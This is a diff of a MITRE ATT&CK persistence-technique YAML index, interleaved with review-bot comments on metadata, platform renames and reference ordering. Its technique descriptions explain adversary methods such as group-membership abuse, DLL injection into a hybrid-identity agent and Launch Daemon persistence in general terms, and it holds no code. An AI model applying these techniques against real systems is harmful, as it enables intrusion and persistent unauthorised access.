+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
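Review bot: the new T1098.007 block ends with `atomic_tests: []` and has no `identifier: T1098.007` line, whereas T1556.002, T1505.005 and T1176 above each carry `identifier:` before `atomic_tests:`; T1137.005 in the same hunk also lacks one, so confirm whether the generator only emits `identifier` for techniques that already have atomics or whether the new entry is missing it. Also note that T1137.005's platform changes from `Office 365` to `Office Suite`; any index or filter keyed on the old platform string needs the same rename.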
@@ -29735,7 +30169,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -29790,13 +30224,11 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -29857,9 +30289,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -29868,7 +30300,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -29921,7 +30352,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -29942,12 +30373,11 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -30031,11 +30461,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -30048,7 +30477,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -30061,7 +30489,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -30091,7 +30518,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1525:
@@ -30123,7 +30551,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -30145,8 +30573,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -30172,7 +30598,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30198,36 +30624,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
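Review bot: The Azure AD to Entra ID rename is correctly confined to prose here; the citation keys `(Citation: Azure AD Hybrid Identity)` and `(Citation: Azure AD Connect for Read Teamers)` and the literal service name `AzureADConnectAuthenticationAgentService` are left untouched, which is right, because citation keys must match a `source_name` in `external_references` and the service name is what actually appears on the PTA host. The `Read Teamers` spelling in that key is upstream ATT&CK data; correcting it in the description without the matching reference entry would break the citation, so it should stay as is until upstream changes it.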
@@ -30235,9 +30659,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -30246,21 +30670,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
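Review bot: The platform list for T1556.007 drops `Azure AD`, `Google Workspace` and `Office 365` and adds `Office Suite` and `Identity Provider`, with the 1.0 to 1.1 version bump consistent with a metadata-only revision. Any downstream consumer that filters techniques by the old platform names will silently lose T1556.007 unless it is regenerated or its mapping is updated to the new names, so the patch should be checked for the matching index changes. The remainder of the hunk (`x_mitre_deprecated`, `x_mitre_domains`, `x_mitre_is_subtechnique` and `x_mitre_modified_by_ref` moving above `x_mitre_platforms`) is key reordering with no content change.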
@@ -30300,13 +30725,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30383,12 +30805,11 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30407,6 +30828,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -30414,7 +30836,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -30434,29 +30855,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1505.003:
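Review bot: The `external_references` changes in this hunk mix two things that are easier to review apart: a genuine content update (the CreateProcess and WinExec entries now point at learn.microsoft.com with a September 12, 2024 retrieval date, and `revoked: false` plus `x_mitre_attack_spec_version: 3.2.0` are added) and a pure reordering of the same four references, which is what makes the hunk look larger than it is. If the generator can emit `external_references` in a stable order, for example `mitre-attack` first and the rest sorted by `source_name`, these reorder-only diffs disappear and the real updates stand out.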
@@ -30533,12 +30956,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30553,6 +30975,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -30561,18 +30984,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -30604,9 +31027,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -30678,7 +31098,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -30705,7 +31124,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -30731,13 +31150,11 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -30858,7 +31275,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1136.001:
@@ -30930,7 +31346,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests: []
T1547.004:
@@ -31000,7 +31415,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -31110,7 +31524,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -31164,7 +31577,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31197,8 +31610,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1574.005:
@@ -31229,7 +31640,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
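Review bot: Separate from the `modified` change on the `-`/`+` pair, the context lines above it carry a retrieval date that cannot be right: the reference is dated December 8, 2015 but reads `Retrieved December 4, 2014`. This is upstream ATT&CK data reproduced verbatim, so it is not something to patch locally, but it is worth reporting upstream rather than letting every regeneration carry it forward.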
@@ -31264,12 +31675,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31346,7 +31755,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1136.002:
@@ -31400,7 +31808,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests: []
T1542.002:
@@ -31432,7 +31839,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31462,55 +31869,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
